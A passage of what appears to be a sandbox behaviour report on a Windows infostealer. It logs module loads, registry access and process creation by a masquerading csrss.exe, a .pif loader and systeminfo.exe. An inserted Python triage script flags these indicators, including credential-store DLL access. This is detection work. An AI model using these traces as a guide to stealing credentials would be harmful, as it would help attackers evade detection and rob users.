                        Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: zipfldr.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: url.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ieframe.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: wkscli.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: archiveint.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ieproxy.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: mssip32.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: smartscreenps.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??????????.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ???.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ???.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ???.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??l.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??l.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ?.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ?.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??l.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ????.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ???e???????????.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ???e???????????.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ?.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ?.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ?.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ?.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??l.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??l.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: tquery.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: cryptdll.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: spp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: vssapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: vsstrace.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: endpointdlp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: endpointdlp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: endpointdlp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: endpointdlp.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: advapi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: sppwmi.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: sppcext.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: winscard.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: devobj.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                        Source: C:\Users\user\Links\iaoqralA.pif | Section loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: ieframe.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: netapi32.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wkscli.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mlang.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: winsqlite3.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: vaultcli.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wintypes.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Section loaded: wininet.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Section loaded: mswsock.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Section loaded: dnsapi.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Section loaded: iphlpapi.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Section loaded: rasadhlp.dll
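The "Section loaded" rows above are the raw evidence behind several of the report's signatures: a PE named csrss.exe living under the user's AppData\Roaming, a .pif in the user's Links folder acting as a loader, systeminfo.exe (spawned by the randomly named executable under Program Files (x86)) pulling in vaultcli.dll and winsqlite3.dll, and a long run of junk module names the sandbox renders as "?". The Python below is an added triage example, not Joe Sandbox code: it parses rows in this format (raw fused rows and cleaned "Source | Section loaded" rows both work) and applies those four checks. The sample rows are copied from the list above; the rule names, the system-directory and system-process-name lists, the credential-store DLL set and its allowlist are assumptions for illustration and should be tuned per environment.

```python
import re
from collections import Counter

# Constructed sample input: rows copied from the "Section loaded" list above,
# in both the raw fused form and the cleaned "Source | Section loaded" form.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: ??????????.dll
Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
Source: C:\Users\user\AppData\Roaming\csrss.exe | Section loaded: am.dll
Source: C:\Users\user\Links\iaoqralA.pif | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: vaultcli.dll
"""

# One row: "Source: <image path>[ | ]Section loaded: <module>[Jump to behavior]"
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Section loaded:\s*(?P<mod>\S+?)"
    r"(?:Jump to behavior)?\s*$"
)

# Tuning assumptions, not facts from the report: adjust per environment.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SYSTEM_PROCESS_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "smss.exe",
                        "winlogon.exe", "services.exe", "wininit.exe"}
SUSPICIOUS_EXTS = (".pif", ".scr", ".com")
CRED_STORE_DLLS = {"vaultcli.dll", "winsqlite3.dll"}  # Credential Manager, browser SQLite stores
CRED_STORE_ALLOWED = {"explorer.exe"}                   # hypothetical allowlist
# '?', '<', '>', '|', '"' and '*' cannot appear in a Windows file name; the
# sandbox renders unprintable bytes as '?', so anything outside [\w.-] is junk.
VALID_MODULE_RE = re.compile(r"^[\w.\-]+\.dll$", re.IGNORECASE)


def parse_rows(text):
    """Yield (source_path, module) pairs from 'Section loaded' rows."""
    for line in text.splitlines():
        m = ROW_RE.search(line.strip())
        if m:
            yield m.group("src"), m.group("mod")


def analyze(text):
    """Return de-duplicated (rule, source_path, module) findings."""
    findings, seen = [], set()

    def add(rule, src, mod=""):
        key = (rule, src, mod)
        if key not in seen:
            seen.add(key)
            findings.append(key)

    for src, mod in parse_rows(text):
        directory, _, name = src.lower().rpartition("\\")
        # 1. A system-process name (csrss.exe) living outside System32/SysWOW64.
        if name in SYSTEM_PROCESS_NAMES and not directory.startswith(SYSTEM_DIRS):
            add("system-name-outside-system-dir", src)
        # 2. A loading image with a disguising extension (.pif).
        if name.endswith(SUSPICIOUS_EXTS):
            add("suspicious-extension", src)
        # 3. Module names that cannot be real file names (junk LoadLibrary calls).
        if not VALID_MODULE_RE.match(mod):
            add("garbled-module-name", src, mod)
        # 4. Credential/browser-store DLLs loaded by a process with no business with them.
        if mod.lower() in CRED_STORE_DLLS and name not in CRED_STORE_ALLOWED:
            add("credential-store-dll", src, mod)
    return findings


def load_counts(text):
    """How often each (source, module) pair appears; one module loaded over
    and over by one process (am.dll above) stands out here."""
    return Counter(parse_rows(text))


if __name__ == "__main__":
    for rule, src, mod in analyze(SAMPLE_ROWS):
        print(f"{rule:32} {src} {mod}")
    for (src, mod), n in load_counts(SAMPLE_ROWS).most_common(3):
        print(f"{n:3}x {src} -> {mod}")
```

The rules deliberately key on the loading image rather than on the module name alone: wininet.dll or winsqlite3.dll in a browser is normal, the same DLL in a console utility that was started by an unknown binary is the signal. Feed the script a full report export and sort `load_counts` to spot the repeated junk loads that FormBook-style samples use as decoys.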
                        Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                        Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                        Source: Binary string: sysinfo.pdb source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: sysinfo.pdbGCTL source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: iaoqralA.pif, iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
